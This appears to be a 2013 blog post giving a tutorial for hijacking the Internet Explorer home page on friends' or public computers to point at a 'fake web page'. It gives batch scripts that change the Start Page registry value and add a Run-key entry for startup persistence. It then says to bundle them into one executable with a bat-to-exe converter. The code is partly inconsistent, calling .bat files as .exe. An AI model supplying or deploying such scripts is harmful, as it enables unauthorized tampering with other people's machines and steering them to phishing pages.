Monday, June 17, 2013

Hijacking Inernet Explorer home page

It is usefull if you have your own fake web page and wann to fix public place or your friends internet explorer home page or if you just want to

Make there .bat files
  1. homepage.bat
  2. hijack.bat
  3. call.bat
code for homepage.bat file

reg add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /d "" /f

code for hijack.bat

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Homepage" /d "C:\WINDOWS\homepage.exe" /f

code for call.bat

copy homepage.exe C:\WINDOWS\homepage.exe

call C:\WINDOWS\homepage.exe

call hijack.exe

Now download Bat_To_Exe_Converter v1.5 from google in free and size 420 kb (or another converter) and convert call.bat to call.exe and include your 1.homepage.bat 2.hijack.bat

Now your call.exe is a small exe program that set internet explorer home to your fake page each time when computer is started.

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